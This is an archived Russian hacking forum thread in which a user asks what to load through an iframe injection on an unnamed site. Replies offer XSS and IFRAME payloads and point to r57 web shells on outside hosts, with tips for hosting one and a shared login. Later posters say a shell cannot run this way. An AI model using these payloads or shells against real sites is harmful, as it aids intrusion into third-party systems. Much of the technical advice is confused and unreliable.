PDA

Просмотр полной версии : Xss->...


Qwertison
15.10.2007, 16:56
Есть уязвимость которая позволяет подставить %3CIFRAME%20SRC=http://ha.ckers.org/scriptlet.html%20%3C
в запрос и выскочит окно с xss (точнее окно _http://ha.ckers.org/scriptlet.html) Что еще можно загрузить на эту страницу? (не вообще что только можно, а что-то полезное для себя:))

kair
15.10.2007, 17:02
<SCRIPT LANGUAGE="JavaScript">alert('XSS')</SCRIPT>
может это инклуд а не xss!? xss исполняется на уязвимом сайте
если это инклуд ты можешь сделать так

%3CIFRAME%20SRC=http://ya.ru идолжен появится яндекс

или так
%3CIFRAME%20SRC=http://hack.net/r57shell.php

Qwertison
15.10.2007, 17:05
%3CIFRAME%20SRC=http://ya.ru%20%3C
яндекс появился))
%3CIFRAME%20SRC=http://hack.net/r57shell.php - что это даст?

kair
15.10.2007, 17:08
значит это инклуд!!! подставляй вместо яндекса шелл

Qwertison
15.10.2007, 17:10
инклуд!!инклуд!!(что это такое?) шелла там нет где ты указал(

kair
15.10.2007, 17:13
http://www.security-frog.org/hack/r57shell-inversa.txt
и выполняй команды
можешь взять любой шелл по адресу
https://forum.antichat.ru/thread20314.html

Qwertison
15.10.2007, 17:18
как команды выполнять? вылезло окошечко такое же как и на __http://www.security-frog.org/hack/r57shell-inversa.txt__ Всмысле текст тхт, нет меню как у залитого шелла...

kair
15.10.2007, 17:19
вместо txt пиши php
%3CIFRAME%20SRC=http://www.security-frog.org/hack/r57shell-inversa.php

Qwertison
15.10.2007, 17:21
Error 404!

/hack/r57shell-inversa.php
File Not Found!

delay(0)
15.10.2007, 17:55
Error 404!

/hack/r57shell-inversa.php
File Not Found!
Сохрани этот файл у себя на компе, переименуй в .php, загрузи на народ.ру и подставляй адрес до него.

0nep@t0p
15.10.2007, 17:55
Фух, давай по инструкции просто пиши %3CIFRAME%20SRC=http://angerrr.nm.ru/sh.php%20%3C
login: vasja
pass: vasja

Qwertison
15.10.2007, 18:28
я пробывал так......думаеш я дурак....не пашет оно!!!! вылазит окно с записанным исходным кодом шелла.....

bul.666
15.10.2007, 18:38
мда...
Вы через ифрэйм пытаетесь получить шелл? мдя....
Здесь тока Xss

Qwertison
15.10.2007, 18:44
тоесть через ифрейм нифига не сделаешь?

bul.666
15.10.2007, 18:45
Можно провести Xss...
Забудь про шелл...
Т.к. в этом случае скрипт шелла выполняет хост на котором лежит шелл, но не сайт с ифрэмом

m0nzt3r
15.10.2007, 21:55
Думаю, ответ ясен.Ничего не сделаешь, инфрейм.И какой толк от хсс) Закрыто.